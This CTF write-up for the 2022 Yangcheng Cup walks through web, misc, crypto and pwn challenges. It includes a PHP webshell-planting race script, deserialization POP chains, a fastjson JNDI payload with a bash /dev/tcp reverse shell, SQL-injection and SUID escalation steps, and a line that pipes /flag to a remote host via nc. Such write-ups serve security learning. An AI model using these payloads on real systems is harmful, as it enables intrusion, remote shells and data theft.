2022 羊城杯 (Yangcheng Cup) Writeup


web

rce_me

<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
    $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
    foreach($blacklist as $blackword){
        if(stristr($var, $blackword)) return False;
    }
    return True;
}
if(fliter($_SERVER["QUERY_STRING"]))
{
    include $file;
}
else
{
    die("Noooo0");
}

The goal is a webshell. The challenge blacklists a lot of characters, but look at what is actually filtered: `fliter()` runs over `$_SERVER["QUERY_STRING"]`, i.e. the raw, still percent-encoded query string, while the included path comes from the decoded `$_GET["file"]`, and nothing inspects the request body at all. The shell is therefore written through the `session.upload_progress` trick (the reference below also covers writing a shell with `echo`): while a file upload is in progress PHP stores the progress record, including the attacker-supplied `PHP_SESSION_UPLOAD_PROGRESS` field, in `/tmp/sess_<PHPSESSID>`, and that file is then pulled in with `?file=/tmp/sess_<PHPSESSID>`. Reference:
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
PHP removes the progress record as soon as the upload finishes, so the upload and the include have to be sent at the same time; a multi-threaded script does the race. One caveat the blacklist makes obvious: `_` is on it and `sess_` contains one, so if the request is answered with `Noooo0`, send the underscore percent-encoded (`%5f`); the raw query string then passes the filter while `$_GET["file"]` still decodes to the real path.

# coding=utf-8
import io
import threading
import requests

sessid = 'flag'
url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"
# Once /tmp/sess_<sessid> is included, the PHP_SESSION_UPLOAD_PROGRESS value is
# executed: it runs $_POST['cmd'] and drops a persistent shell into a.php
data = {"cmd": "system('cat f*');"}
shell = "<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),'<?php @eval($_POST[wa1ki0g])?>');?>"
stop = threading.Event()

def write(session):
    # Keep a slow (50 KB) upload in flight: while it runs PHP keeps the progress
    # record, payload included, in /tmp/sess_<PHPSESSID>
    while not stop.is_set():
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(url,
                     data={"PHP_SESSION_UPLOAD_PROGRESS": shell},
                     files={'file': ('tgao.txt', f)},
                     cookies={'PHPSESSID': sessid})

def read(session):
    # Race the cleanup: include the session file before PHP deletes the record
    # (if the filter rejects the '_', use /tmp/sess%5f instead of /tmp/sess_)
    while not stop.is_set():
        resp = session.post(url + '?file=/tmp/sess_' + sessid, data=data)
        if 'tgao.txt' in resp.text:   # the upload filename echoes back => file was included
            print(resp.text)
            stop.set()

if __name__ == "__main__":
    with requests.session() as session:
        threads = [threading.Thread(target=write, args=(session,)) for _ in range(30)]
        threads += [threading.Thread(target=read, args=(session,)) for _ in range(30)]
        for th in threads:
            th.start()
        for th in threads:
            th.join()
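To see why the raw query string matters, here is an added check (my own code, not part of the original writeup or the challenge) that ports `fliter()` to Python and compares what the filter sees with what `$_GET["file"]` decodes to. Nothing beyond the blacklist from the challenge source is assumed; `encode_for_filter` is a helper name of mine.

```python
# Added example, not from the original writeup: reproduce the challenge's
# fliter() over the raw query string and compare it with the decoded $_GET value.
from urllib.parse import parse_qs

# Blacklist copied from the challenge source
BLACKLIST = ["<", "?", "$", "[", "]", ";", "eval", ">", "@", "_",
             "create", "install", "pear"]

# Single characters on the blacklist; the words (eval, create, ...) are handled
# by simply not using them in the path
BLACKLISTED_CHARS = set("<?$[];>@_")


def fliter(query_string):
    """Port of fliter(): PHP's stristr() is a case-insensitive substring match."""
    lowered = query_string.lower()
    return not any(word.lower() in lowered for word in BLACKLIST)


def php_get_file(query_string):
    """What $_GET['file'] ends up as: percent-decoding happens after the filter ran."""
    return parse_qs(query_string).get("file", [None])[0]


def encode_for_filter(path):
    """Percent-encode only the blacklisted characters so the raw query string passes.

    urllib.parse.quote() would leave '_' alone (it is in its always-safe set), so
    the encoding is done by hand.
    """
    return "".join("%%%02X" % ord(ch) if ch in BLACKLISTED_CHARS else ch
                   for ch in path)


if __name__ == "__main__":
    raw = "file=/tmp/sess_flag"
    enc = "file=" + encode_for_filter("/tmp/sess_flag")
    print(raw, "->", fliter(raw), php_get_file(raw))
    print(enc, "->", fliter(enc), php_get_file(enc))
```

The second line of output shows the point: the encoded query string passes the filter, yet `$_GET["file"]` still decodes to `/tmp/sess_flag`, so `include $file` opens the session file.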

The script errors out after about 10 seconds, but by then the shell has been written successfully.
The flag cannot be read as the web user, so privilege escalation is needed.
The box is Linux, so SUID binaries are the first thing to look for:
find / -perm -u=s -type f 2>/dev/null
`date` turns up as SUID, and it is enough to read the flag: a SUID `date -f <file>` echoes every line of the file back in its "invalid date" error messages, which works on a root-only file.
Flag obtained.

step_by_step-v3

<?php
error_reporting(0);
class yang
{
    public $y1;
    public function __construct()
    {
        $this->y1->magic();
    }
    public function __tostring()
    {
        ($this->y1)();
    }
    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}
class cheng
{
    public $c1;
    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }
    public function __invoke()
    {
        $this->c1->hint();
    }
}
class bei
{
    public $b1;
    public $b2;
    public function __set($k1,$k2)
    {
        print $this->b1;
    }
    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}
if (isset($_POST['ans'])) {
    unserialize($_POST['ans']);
} else {
    highlight_file(__FILE__);
}
?>

The entry point is `unserialize($_POST['ans'])`, and `yang::__tostring()` calls whatever is stored in `$y1`, so setting `y1 = "phpinfo"` gets us `phpinfo()`. The chain that reaches it: `cheng::__wakeup()` runs during unserialize and assigns `$this->c1->flag`; with `c1` set to a `bei` object (which has no `flag` property) that triggers `bei::__set()`, which does `print $this->b1`; with `b1` set to a `yang` object, printing it invokes `yang::__tostring()`, which finally calls `$this->y1` as a function. `__construct()` is never run by unserialize, so the `$this->y1->magic()` call in it is not a problem.

POP chain generator (POST the output as `ans`):

<?php
class yang
{
    public $y1;
}
class cheng
{
    public $c1;
}
class bei
{
    public $b1;
    public $b2;
}
$yang=new yang();
$cheng=new cheng();
$bei=new bei();
$yang->y1="phpinfo";
$bei->b1=$yang;
$cheng->c1=$bei;
echo serialize($cheng);
?>

Search the phpinfo output for "flag".

simple_json

The attachment is a Java package; reading through the decompiled source turns up a few suspicious spots.
There are three routes.
The version is 1.8.
Two log4j jars are bundled, and Test.class contains a suspicious sink.
The request body, as JSON:

{
    "content":{
        "@type":"ycb.simple_json.service.JNDIService",
        "target":"ldap://101.33.211.155:8087/aaa"
    },
    "msg":{
        "$ref":"$.content.context"
    }
}

In this body, `@type` makes fastjson instantiate `ycb.simple_json.service.JNDIService` with the attacker-controlled `target`, and the `$ref` to `$.content.context` makes it resolve the `context` property through its getter, which is where the JNDI lookup of `target` happens. So we build the chain.
Tool used: https://github.com/Bl0omZ/JNDIEXP

Notes on the gadget chains, from the tool's README:
snakeyaml: command=http://127.0.0.1:8080/exp.jar loads a malicious class. The bundled yaml-payload-master can be used (edit the code and rebuild the jar; instructions are included). A reverse shell cannot be used directly.
ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080/exp.jar
ldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwL2V4cC5qYXI%3D
C3p0: command=http://127.0.0.1:8080:Exploit (the port defaults to 8080). The Exploit under the data directory can be used as a reference; change the command in Exploit.java and compile it with javac (no separate HTTP server is needed).
ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080:Exploit
ldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwOkV4cGxvaXQ%3D

Follow those instructions: change the VPS address in the payload class, recompile it, and put the resulting jar next to the tool. The relevant part of the class (the remaining ScriptEngineFactory methods are unchanged and omitted here):

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            // Runtime.exec() splits the command on whitespace, hence the
            // "bash -c $@|bash" trick to carry the redirections through
            Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/xx.xx.xx/9998 0>&1");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    // ... remaining ScriptEngineFactory methods omitted ...
}

Serve the jar with a python3 HTTP server:

python3 -m http.server 905

Start the LDAP server, JNDIInject-1.2-SNAPSHOT.jar.
Start an nc listener, then trigger the lookup with a request from Burp:

POST /ApiTest/post HTTP/1.1
Host: 8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Length: 258
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Origin: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81/ApiTest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
   "content":{
     "@type":"ycb.simple_json.service.JNDIService",
     "target":
     "ldap://xx.xx.xx.xx:1389/snakeyaml/http://xx.xx.xx:905/exp.jar"
    },
    "msg":{
      "$ref":"$.content.context"
    }
}

The shell comes back.
Get the flag.

ComeAndLogin

The challenge is a login page, so injection is the first thing to check.
Directory scanning finds five accessible files.
Only the admin.php page is of interest, and it needs admin privileges.
Intercepting the login request shows that both username and password are injectable.
Fuzzing shows the username field filters the single quote, `%27` and the hex form alike, but a bare backslash goes through. A trailing backslash in the username escapes the quote that should close the username literal, so the password value ends up being evaluated as SQL.
The page responds normally.
Moving on to the password field: spaces are filtered, so URL-encode the payload to get around it.
Login succeeds.
Now visit admin.php.
From the code hint, `path` has to be received via POST and must contain more than three `/`; that condition is easy to satisfy.
Reference: https://blog.csdn.net/m0_62805300/article/details/124218779
The reference uses the /proc/self/root symlink, which always points back to /, to build such a path and read the flag.
Payload:

path=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag
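An added example (mine, not from the writeup): build the /proc/self/root chain for any target, check it against the more-than-three-slashes condition as described above, and, on Linux, confirm it resolves back to the plain path. The filter function is a reconstruction from the description, not the challenge's code, and `SELF_ROOT`, `build_path`, `passes_slash_filter` and `resolves_to` are names of mine.

```python
# Added example, not from the original writeup: /proc/self/root chain builder
# plus the two checks a practitioner wants before sending it.
import os

# Linux "magic" symlink: every process sees its own root directory here, so
# /proc/self/root/proc/self/root/... collapses back to / however often it repeats
SELF_ROOT = "/proc/self/root"


def build_path(target, repeats):
    """Prefix an absolute `target` with `repeats` copies of /proc/self/root."""
    if not target.startswith("/"):
        raise ValueError("target must be an absolute path")
    if repeats < 1:
        raise ValueError("need at least one /proc/self/root prefix")
    return SELF_ROOT * repeats + target


def passes_slash_filter(path, minimum=3):
    """Reconstruction of the admin.php condition: more than `minimum` slashes."""
    return path.count("/") > minimum


def self_root_available():
    """True on a Linux host with procfs mounted (the symlink exists)."""
    return os.path.islink(SELF_ROOT)


def resolves_to(path):
    """Resolve the chain the way the kernel will: each link goes back to /."""
    return os.path.realpath(path)


if __name__ == "__main__":
    p = build_path("/flag", 3)
    print(p, "slashes:", p.count("/"), "passes:", passes_slash_filter(p))
    if self_root_available():
        print("resolves to", resolves_to(p))
```

`/flag` on its own has one slash and fails the check; three `/proc/self/root` prefixes already give ten, and the payload in the writeup simply repeats the prefix many more times than necessary.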


Safepop

Original challenge: https://xz.aliyun.com/t/10961

<?php
class Fun{
    private $func;
    public function __construct(){
        // Could also be written as $this->func = "Test::getFlag"; that way Test is
        // never instantiated, so its __wakeup() is not triggered at all
        $this->func = [new Test,'getFlag'];
    }
}
class Test{
    public function getFlag(){
    }
}
class A{
    public $a;
}
class B{
    public $p;
}
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;   // B declares no $a, so this becomes a dynamic property
$r = serialize($b);
// bump the declared property count of Fun from 1 to 2 so unserialize() skips __wakeup()
$r1 = str_replace('"Fun":1:','"Fun":2:',$r);
echo urlencode($r1);

It can be used without modification. The `str_replace` sets the declared property count of `Fun` to 2 while only one property follows; PHP versions before 5.6.25 and 7.0.x before 7.0.10 (CVE-2016-7124) then skip `__wakeup()` for that object, which is what the chain needs.
Payload:

?pop=O%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Test%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7D%7D%7D
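As an added example (not from the original writeup), the following Python serializer rebuilds both payloads on this page, the step_by_step-v3 chain and this Safepop one, without running PHP; it reproduces PHP's private-property name mangling and the property-count bump. Class and property names are the ones from the two challenges; `PHPObject` and the helper names are mine.

```python
# Added example, not from the original writeup: a minimal PHP serializer in
# Python covering what the two POP chains on this page need.
from urllib.parse import quote


class PHPObject:
    """A PHP object to serialize. props: list of (name, value, visibility)."""

    def __init__(self, cls, props, count_bump=0):
        self.cls = cls
        self.props = props
        # count_bump > 0 declares more properties than are present, i.e. the
        # "Fun":1: -> "Fun":2: edit used to skip __wakeup() on old PHP
        self.count_bump = count_bump


def _prop_name(obj, name, visibility):
    """PHP mangles non-public names: "\\0Class\\0name" private, "\\0*\\0name" protected."""
    if visibility == "private":
        return "\0%s\0%s" % (obj.cls, name)
    if visibility == "protected":
        return "\0*\0%s" % name
    return name


def php_serialize(value):
    if value is None:
        return "N;"
    if isinstance(value, bool):          # before int: bool is a subclass of int
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # the length is in bytes, and NUL bytes from mangled names count
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, list):
        body = "".join(php_serialize(i) + php_serialize(v)
                       for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PHPObject):
        body = "".join(php_serialize(_prop_name(value, n, vis)) + php_serialize(v)
                       for n, v, vis in value.props)
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls,
                                      len(value.props) + value.count_bump, body)
    raise TypeError("unsupported type: %r" % type(value))


def step_by_step_payload():
    """cheng -> __wakeup -> bei::__set -> print yang -> __tostring -> phpinfo()."""
    yang = PHPObject("yang", [("y1", "phpinfo", "public")])
    bei = PHPObject("bei", [("b1", yang, "public"), ("b2", None, "public")])
    return php_serialize(PHPObject("cheng", [("c1", bei, "public")]))


def safepop_payload():
    """B -> A -> Fun (private func = [Test, 'getFlag']) with the count bump, urlencoded."""
    test = PHPObject("Test", [])
    fun = PHPObject("Fun", [("func", [test, "getFlag"], "private")], count_bump=1)
    a = PHPObject("A", [("a", fun, "public")])
    b = PHPObject("B", [("p", None, "public"), ("a", a, "public")])
    return quote(php_serialize(b), safe="")


if __name__ == "__main__":
    print(step_by_step_payload())
    print("?pop=" + safepop_payload())
```

`quote(..., safe="")` matches PHP's `urlencode()` closely enough here (both encode `:`, `"`, `;`, `{`, `}` and the NUL bytes as `%00`), so the second line printed is exactly the `?pop=` payload above.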


MISC

Check-in (签到)


Treasure Hunt (寻宝)

# Dump the file as hex, one byte at a time, swapping the two nibbles of every byte
with open('./寻宝', 'rb') as f:
    data = f.read()
with open('./1.txt', 'w') as out:
    for byte in data:
        out.write('{:02X}'.format(byte)[::-1])   # e.g. 0x4A -> 'A4'

The output text is hexadecimal.
Decoding it gives the next stage.
From the game and the hint, the piano keys spell the characters 114514.
The picture shows differential Manchester encoding; the recovered bits 01011111011000010011000101011111 are ASCII for `_a1_`.
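As an added example (not part of the original writeup), a small differential Manchester encoder/decoder plus the bit-string to ASCII step used for `_a1_`. The transition convention is an assumption stated in the comments; a captured signal may use the opposite one, so try both.

```python
# Added example, not from the original writeup: differential Manchester coding.
# Convention assumed here (IEEE 802.5 style): every bit cell has a transition
# in the middle; a 0 additionally has a transition at the START of the cell, a
# 1 does not. Some decoders assign 0/1 the other way round, so a real capture
# is usually tried both ways.


def dm_encode(bits, start_level=0):
    """Return the signal as a list of half-bit levels (0/1), two per input bit."""
    level = start_level
    signal = []
    for bit in bits:
        if bit == "0":
            level ^= 1          # transition at the start of the cell encodes 0
        signal.append(level)
        level ^= 1              # mandatory mid-cell transition (clock)
        signal.append(level)
    return signal


def dm_decode(signal, start_level=0):
    """Inverse of dm_encode: a cell whose first half differs from the previous level is 0."""
    if len(signal) % 2:
        raise ValueError("signal must contain two samples per bit")
    prev = start_level
    bits = []
    for i in range(0, len(signal), 2):
        first, second = signal[i], signal[i + 1]
        if first == second:
            raise ValueError("missing mid-cell transition at cell %d" % (i // 2))
        bits.append("0" if first != prev else "1")
        prev = second
    return "".join(bits)


def bits_to_ascii(bits):
    """8 bits per character, MSB first, as in the writeup's 0101111101100001... string."""
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def ascii_to_bits(text):
    return "".join(format(ord(c), "08b") for c in text)


if __name__ == "__main__":
    bits = "01011111011000010011000101011111"
    print(bits_to_ascii(bits))                     # _a1_
    print("".join(map(str, dm_encode(bits))))     # what the waveform looks like
    print(dm_decode(dm_encode(bits)) == bits)
```

Only the start-of-cell transitions carry data; the mid-cell ones are the clock, which is why a wrong initial level corrupts at most the first bit and why the decoder raises on a cell without a mid transition (a sampling error rather than data).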
This gives the password for flag.zip.
The last layer is zero-width character steganography, which yields the flag.

Lost Illusion (迷失幻境)

A forensics challenge, and I happened to have 取证大师 (Forensic Master) available.
Load the image into Forensic Master.
It contains two files: a text file named 45 and a jpg.

Look at each in turn. The 45 text file first: comparing its hex dump in Forensic Master against a normal PNG shows that the PNG chunk structure is present but the leading 8-byte PNG signature is missing.
Open 45 in 010 Editor and prepend the signature.
That gives a complete PNG.
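Added example (not from the writeup): detecting a PNG whose signature was stripped, restoring it and checking the chunk CRCs afterwards, which is the same repair done in 010 Editor above but scriptable. The test image is built in code; nothing from the challenge is used, and the function names are mine.

```python
# Added example, not from the original writeup: repair a headerless PNG and
# verify its chunks. Sample image constructed below, not the challenge file.
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype, data):
    """length + type + data + CRC32(type + data), as the PNG spec lays chunks out."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width, height):
    """A minimal valid 8-bit RGB PNG, all-black pixels (constructed test data)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # one filter byte (0 = None) per scanline, then RGB triples
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(raw)) + png_chunk(b"IEND", b""))


def parse_chunks(data):
    """Walk the chunks after the signature; return [(type, crc_ok), ...]."""
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        chunks.append((ctype, (zlib.crc32(ctype + body) & 0xFFFFFFFF) == crc))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks


def repair_signature(data):
    """If the file starts straight at the IHDR chunk, put the signature back."""
    if data.startswith(PNG_SIGNATURE):
        return data
    # IHDR is always the first chunk and always 13 bytes long: 00 00 00 0D 'IHDR'
    if data[:8] == b"\x00\x00\x00\x0dIHDR":
        return PNG_SIGNATURE + data
    raise ValueError("not a PNG with its signature stripped")


if __name__ == "__main__":
    stripped = make_png(4, 4)[8:]          # simulate the challenge file
    fixed = repair_signature(stripped)
    print(parse_chunks(fixed))             # all CRCs should be True
```

Checking the CRCs after the repair is the cheap way to confirm nothing else in the file was touched; a chunk whose CRC fails after prepending the signature means the damage goes beyond the missing header.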
Forensic Master also lists 99 PNG files; spot-checking shows they are all identical, just a distraction.
Export the PNG and run it through Stegsolve's XOR/plane analysis, which reveals the key 可莉前来报道.
Now the jpg: a picture of an anime girl with nothing visibly wrong with it.
Taking the key from the PNG together with the jpg, and given that the image itself is not encrypted, steganography is the only option left. outguess extracts the flag:

outguess -k "可莉前来报道" -r /home/kali/Desktop/test1/h.jpg flag.txt

where_is_secret

Extract the archive.

Then reuse the script from the 一起看小说吗 writeup at https://shimo.im/docs/gwpcxkryVJwyJVHR/read:

from PIL import Image

def decode(im):
    # Each pixel hides one character: the code point is (G << 8) | B; a fully
    # black pixel marks the end of the text
    width, height = im.size
    lst = []
    for y in range(height):
        for x in range(width):
            red, green, blue = im.getpixel((x, y))
            if (blue | green | red) == 0:
                break
            index = (green << 8) + blue
            lst.append(chr(index))
    return ''.join(lst)

if __name__ == '__main__':
    all_text = decode(Image.open("./out.bmp", "r").convert("RGB"))
    with open("decode.text", "w", encoding="utf-8") as f:
        f.write(all_text)

Keeping only the text between `{` and `}` gives h1d3_1n_th3_p1ctur3.

Unlimited Zip Works

Unzipping shows a comment on the archive.
Inspect the archive with zipfile and pull out the comments.
The comment contains yet another zip.
Extract the archive straight from the comments:

import zipfile

name = 'file'
comments = []      # one comment per entry, in the order the archives are opened
filename = None

# Every archive in the chain is password-protected; the password is the first five
# characters of the nested .zip's filename (reused if an archive has no nested zip),
# and each entry's comment holds a slice of a further archive that is reassembled
# once flag.txt is reached
while True:
    with zipfile.ZipFile(name + '.zip', 'r') as fz:
        for i in fz.namelist():
            if "zip" in i:
                filename = i[0:5]
        fz.extractall(pwd=bytes(filename, 'utf-8'))
        name = filename
        for j in fz.infolist():
            comments.append(j.comment)
            if 'flag.txt' in str(j):
                print('[+] extraction finished')
                # the slices were stored last-to-first, so reverse before joining
                with open('./newfile.zip', 'wb') as f:
                    f.write(b''.join(comments[::-1]))
                print("[+] wrote new archive newfile.zip")
                raise SystemExit(0)

The new archive holds yet another archive, this time spread over the entries' extra fields:

from zipfile import ZipFile

# The next archive is split across the "extra" field of every entry; concatenate them
data = []
with ZipFile('newfile.zip', 'r') as zf:
    for i in zf.infolist():
        data.append(i.extra)
with open('flag.zip', 'wb') as fz:
    fz.write(b''.join(data))

The script extracts it directly.

The resulting image has nothing in it, but opening it in 010 Editor shows another zip appended after the image data; carve that out as well.

Hide and Seek (躲猫猫)

A zip is found in the pcap; export it.

It contains a PNG image.

The archive also contains key.log, which is not encrypted. Loading it as the TLS key log file decrypts the TLS traffic, and a jpg shows up in the HTTP/2 stream; export it.

The zip password is found there.

Extract the archive.

The script inside is a modified version of an earlier CTF challenge; adjusting x and y decrypts an image.
https://blog.csdn.net/weixin_51122085/article/details/125851791
The image looks like DotCode at first, but DotCode has a circle or a square in the middle, whereas the decoded image has a pentagon.
In the list on the left of the decoder, MaxiCode is the one shown with a pentagon in the middle, so decode it as MaxiCode.

CRYPTO

Easyrsa

import gmpy2
p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
e = 65537
# output.txt holds one modulus per line, every one sharing the prime p; the
# message was encrypted through the moduli in file order, so peel the layers
# off in reverse
with open('output.txt', 'r') as f:
    for line in f.readlines()[::-1]:
        n = int(line)
        q = n // p
        assert p * q == n, "modulus does not share p"
        d = int(gmpy2.invert(e, (p - 1) * (q - 1)))
        c = pow(c, d, n)
m = c
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))

lrsa

$$
t=(p-58)P+q-kQ \\
kQ-(p-58)P=q-t\approx q \\
L=\begin{pmatrix}
1 & P \\
0 & Q
\end{pmatrix} \\
b=(58-p,\,k)\,L=(58-p,\,q-t) \\
|b|\le 2^{\frac{1}{4}}\det(L)^{\frac{1}{2}}
$$

From these relations, the vector b = (58-p, q-t) is a lattice vector of L short enough to satisfy the bound, so reducing L (LLL, or plain Gauss reduction since the lattice is 2-dimensional) recovers q-t directly; t is known and small, so q follows. P and Q themselves come from the two given products: gcd(PPQ, PQQ) = PQ, then P = PPQ/PQ and Q = PQQ/PQ.

from Crypto.Util.number import GCD, isPrime, inverse, long_to_bytes
PPQ=17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ=17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
t=44
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
# PPQ = P*P*Q and PQQ = P*Q*Q, so the gcd is P*Q and both factors follow
PQ = GCD(PPQ, PQQ)
P = PPQ // PQ
Q = PQQ // PQ
# Lattice reduction, run in Sage:
#   L = matrix(ZZ, [[1, P], [0, Q]])
#   print(L.LLL()[0][1])     # second coordinate of the short vector, i.e. q - t
a=71239161441539946834999944364158306978517617517717217001776063773301330324729178632534286023377366747004115034635139042058644768011502688969022553791977558750633767627495955645170437100983708648876951588485253787441732757259210010467734037546118780321368088487269039555130213851691659851510403573663333586407
q = a + t
assert isPrime(q)
# c was produced modulo q alone, so a single-prime RSA decryption finishes it
e = 65537
d = inverse(e, q - 1)
m = pow(c, d, q)
print(long_to_bytes(m))

PWN

The first pwn challenge was solved with a single command, piping the flag out to a listener:
.shell cat /flag | nc 124.223.104.219 1234

fakeNoOutput-v2

from pwn import *

context.log_level = 'debug'
elf = ELF('fakeNoOutput')
p = remote('tcp.dasc.buuoj.cn', 20112)
# p = process('./fakeNoOutput')
libc = ELF('libc.so.6')

# The binary speaks HTTP; the headers are parsed before the overflowing field
head = '''head /upload HTTP/1.1
HTTP_SERVER1_token: 
User-Agent: 
Cookie: 
Referer: 
Content-Length: 4196
'''
p.sendline(head.encode())
p.sendline(b'Content:filename=')

text = 0x080496A1            # routine that prints the string at its first argument
main = 0x8049F77
fwrite_got = elf.got['fwrite']

